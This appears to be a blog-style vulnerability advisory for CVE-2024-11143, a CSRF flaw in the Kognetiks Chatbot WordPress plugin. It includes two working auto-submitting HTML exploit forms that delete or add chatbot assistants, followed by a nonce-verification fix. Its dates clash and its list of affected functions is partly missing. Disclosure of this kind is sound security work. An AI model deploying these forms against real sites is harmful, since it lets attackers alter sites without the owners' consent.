CVE-2024-11143 - Critical CSRF Vulnerability in Kognetiks Chatbot for WordPress Plugin - Full Analysis, Exploit, and Mitigation
Published: June 2024
What is CVE-2024-11143?
If you use the Kognetiks Chatbot for WordPress plugin, you need to pay attention: there's a serious security issue (CVE-2024-11143) affecting all versions up to and including 2.1.8. This vulnerability allows attackers to exploit your site using Cross-Site Request Forgery (CSRF) due to missing or incorrect nonce validation in several plugin functions.
In plain English: An attacker can trick you, as a site admin, into clicking a malicious link. If you do, they can modify your chatbot assistants—add, update, or even delete—*without your consent.*
delete_assistant
All these functions lack proper WordPress nonce verification. That means the plugin cannot verify if the actions are coming from a legitimate source, making CSRF attacks possible.
Attacker crafts a malicious request to the vulnerable functions.
2. Attacker tricks an admin (you) into visiting a page or clicking a link (for example, via email, comment, or social media).
3. The request is sent by your browser with your admin privileges, and Kognetiks Chatbot accepts it, believing it's legit.
Sample Exploit Code
Below is an example of a CSRF exploit targeting the delete_assistant function. Suppose your WordPress site is at https://yoursite.com and the attacker wants to delete an assistant with ID 5.
The attacker could host this HTML code on any website
<!-- ATTACKER'S MALICIOUS PAGE -->
<html>
<body>
<form action="https://yoursite.com/wp-admin/admin-ajax.php" method="POST" id="csrfForm">
<input type="hidden" name="action" value="delete_assistant">
<input type="hidden" name="assistant_id" value="5">
</form>
<script>
document.getElementById('csrfForm').submit(); // Auto-submit the form when admin visits
</script>
</body>
</html>
When a logged-in admin visits this attacker's page, the assistant with ID 5 is deleted—no confirmation, no warning.
To add a malicious assistant, the attacker may use
<form action="https://yoursite.com/wp-admin/admin-ajax.php" method="POST" id="csrfAdd">
<input type="hidden" name="action" value="add_new_assistant">
<input type="hidden" name="assistant_name" value="Evil Assistant">
<input type="hidden" name="assistant_config" value='{"actions":["do anything a bot can"]}'>
</form>
<script>
document.getElementById('csrfAdd').submit();
</script>
Wordfence advisory:
https://www.wordfence.com/threat-intel/vulnerabilities/id/9c338337-333d-497d-9cc1-4d13bc15b814
Official CVE details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11143
Plugin Page:
Kognetiks Chatbot for WordPress
Technical Notes: How Developers Should Fix
To protect against CSRF in WordPress, you should always verify nonces on actions that alter data. Example fix for the delete_assistant function:
// Before processing the request:
if ( ! isset($_POST['_wpnonce']) || ! wp_verify_nonce($_POST['_wpnonce'], 'delete_assistant_nonce') ) {
wp_die('Security check failed');
}
// ... proceed with deletion
Conclusion
CVE-2024-11143 is a critical CSRF vulnerability in the Kognetiks Chatbot for WordPress plugin, allowing attackers to modify your assistants by tricking you into clicking a malicious link. This is a serious threat to the integrity of your site and bot interactions.
Update your plugin NOW or disable it until a patch is released!
Stay safe, and always keep your plugins updated.
*You read it here first. Share this to help protect more WordPress sites!*
Timeline
Published on: 11/13/2024 03:15:05 UTC
Last modified on: 11/18/2024 15:03:56 UTC